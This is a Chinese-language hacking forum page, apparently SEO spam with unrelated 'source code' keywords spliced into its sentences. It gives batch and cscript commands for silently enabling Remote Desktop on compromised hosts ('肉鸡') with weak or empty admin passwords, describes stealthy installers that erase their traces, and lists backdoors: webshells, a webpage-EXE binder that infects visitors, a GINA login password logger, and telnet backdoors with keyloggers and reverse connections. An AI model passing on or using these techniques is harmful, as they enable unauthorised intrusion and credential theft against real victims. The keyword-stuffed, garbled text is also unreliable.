1.200分.找一个懂防鸡的管理源码朋友
2.怎样破解3389远程登陆密码?
200分.找一个懂防鸡的朋友
可能的状况很多,不一定是管理源码中木马,一些常规的管理源码操作可以在telnet中操作,也许是管理源码黑客远程破解了你的登录密码,或者是管理源码你根本就没设开机密码。
那样只要你的管理源码德育分量化考核系统源码机子开了相关的服务项就可以从任意端口入侵(所以才有某些端口,服务很危险的管理源码说法),可以执行很多的管理源码cmd下的操作,比如给你格盘,管理源码删除添加东西,管理源码终止进程,管理源码远程关机,管理源码修改服务项和注册表。管理源码这个并不是管理源码木马(因为这是系统自带的功能,总不会把windows的管理源码东东视为木马吧?),杀毒是不行的,因为根本没毒。以前我经常这样恶搞别人的机子。
还有更强的,就是店铺认领源码通过黑客软件开启对方的。
也有可能确实是木马,只是他的木马可以过卡巴,,(这可能是一个脱离了菜鸟级的黑客。他可以把木马免杀过卡巴7.0)
你先看看你的木马强不强,你把进程看一下。用,或是其他第三方软件查看,可以显示进程所使用的文件的路径。要是不是常用的,也不是你熟悉的,基本就先终止再删除。(删除就在查看的路径删除)
现在的一些木马很强的,查看不到它的文件(函数调用被拦截了),也看不到进程(被隐藏到系统核心进程里了),扫毒也扫不出来。(当然啦,各个杀毒软件的杀伤力是不同的,卡巴理应是外包系统 源码最好的杀毒软件了。卡巴都扫不出来,其他的也不行吧,你可以试试微点,是免费的,映像还可以)
那样的话,建议重装系统,
因为你有清理木马的功夫可以装十几个系统了。。格c盘,重装。
怎样破解远程登陆密码?
1.怎么样开端口,这里我把他们总结一下,很全面,希望对你有用:
1,打开记事本,编辑内容如下:
echo [Components] > c:\sql
echo TSEnable = on >> c:\sql
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
编辑好后存为BAT文件,上传至肉鸡,执行。这里值得注意的是要确定winnt是否在c盘,如果在其他盘则需要改动。源码php 积分
2 (对xp\都有效) 脚本文件 本地开 工具:rots1.
使用方法:
在命令行方式下使用windows自带的脚本宿主程序cscript.exe调用脚本,例如:
c:\>cscript ROTS.vbs <目标IP> <用户名> <密码> [服务端口] [自动重起选项]
服务端口: 设置终端服务的服务端口。默认是。
自动重起选项: 使用/r表示安装完成后自动重起目标使设置生效。
使用/fr表示强制重起目标。(如果/r不行,可以试试这个)
使用此参数时,端口设置不能忽略。
比如扫描到了一个有NT弱口令的服务器,IP地址是...,管理员帐户是administrator,密码为空
运行CMD(下的DOS),我们给它开终端!
命令如下!
cscript reg.vbe ... administrator "" /fr
上面的命令应该可以理解吧?cscript reg.vbe这是命令,后面的是IP,然后是管理员帐户,接这是密码,因为... 这台服务器的qt toolbar 源码管理员密码是空的,那就用双引号表示为空,再后面是端口,你可以任意设置终端的端口,/fr是重启命令(强制重启,一般我都用这个,你也可以/r,这是普通重启)
脚本会判断目标系统类型,如果不是server及以上版本,就会提示你是否要取消。
因为pro版不能安装终端服务。
如果你确信脚本判断错误,就继续安装好了。
如果要对本地使用,IP地址为.0.0.1或者一个点(用.表示),用户名和密码都为空(用""表示)。
脚本访问的目标的端口,如果目标端口未开放,或者WMI服务关闭,那么脚本就没用了。
3,下载自动安装程序-djshao正式版5.0
说明:
解压djshao5.0.zip,用你的随便什么方法把把解压出来的djxyxs.exe上传到肉鸡的c:\winnt\temp下,然后进入c:\winnt\temp目录执行djxyxs.exe解压缩文件,然后再执行解压缩出来的azzd.exe文件,等一会肉鸡会自动重启!重启后会出现终端服务!
特点:1、不用修改注册表的安装路径,注册表会自动修改,安装完后会自动恢复到原来的安装路径,2、在后台安静模式运行,就算肉鸡旁有人也没有关系!3、在添加和删除中看不出终端服务被安装的痕迹,也就是启动终端前不会打钩,4、不会在肉鸡上留下你的上传文件,在安装完终端服务后会会自动删除你上传到c:\winnt\temp下的任何文件!5、不管肉鸡的winnt装在什么盘上都无所谓!6、安装完终端后会删除在管理工具中的终端快捷图标!7、在没有安装终端前,终端服务是被禁止的!安装终端后,终端服务被改为自动!但是如果在安装前终端服务是手动!安装后就可能还是手动!等重启后就不会打开服务!所以在软件中加了sc指令,等安装完后,不管终端服务是禁止还是手动还是自动,全部改为自动。8、自动检测肉鸡是不是服务器版,如果不是删除原文件,不执行安装,如果是服务器版就执行安装!9、支持中日韩繁四个版本的win服务器版!
4,下载DameWare NT Utilities 3..0.0 注册版
安装注册完毕后输入对方IP用户名密码,等待出现是否安装的对话框点是。
复制启动后出现对方桌面。
在对方桌面进入控制面版,点添加或删除程序。进入后点添加/删除windows组件,找到终端服务,点际进入后在启动终端服务上打上勾。确定自动提示重起,重起后OK
5.运用远程开启软件开启(需要有对方机子的管理员帐号和密码)
6.在自己机上安装一个cn的ftp服务器,在对方的dos下将本机的开启工具下载到对方机子,然后执行.
2.CGI后门:
cgi网页后门 cgi网页后门,envymask编写...《
网页合并器 本程序可以自动生成网页,可以把网页和EXE合成新的网页,在打开网页的同时自动运行EXE文件.你将木马合并在一个网页中,别人浏览之后,呵呵,我什么都没说~~~
海阳顶端网木马 windows环境下永远不会被查杀的木马,因为它是用asp做的,也是一套asp在线极好的网页编辑软件,支持在线更改、编辑、删除任意文本文件,同时最重要的是解决了无组件asp上传...(中文版
cgi-backdoor 几个cgi木马(十多种利用最新漏洞的web脚本后门,涵盖jsp,php,asp,cgi等等) *
命令行后门类
winshell
WinShell是一个运行在Windows平台上的Telnet服务器软件,主程序是一个仅仅5k左右的可执行文件,可完全独立执行而不依赖于任何系统动态连接库,尽管它体积小小,却功能不凡,支持定制端口、密码保护、多用户登录、NT服务方式、远程文件下载、信息自定义及独特的反DDOS功能等...《入侵NT中winshell的使用》
Gina
Gina木马的主要作用是在系统用户登陆时,将用户登陆的名字,登陆密码等记录到文件中去,因为这个DLL是在登陆时加载,所以不存在象findpass那类程序在用户名字是中文或域名是中文等无法得到用户...儒
Wollf1.5 我们的一位女黑客写的软件,扩展Telnet服务,集成文件传输、Ftp服务器、键盘记录、Sniffer(for win2k only)、端口转发等功能,可反向连接,可通过参数选择随系统启动或作为普通进程启动
WinEggDrop Shell 1.最终版在 一个扩展型的telnet后门程序{ 中国最强的后门}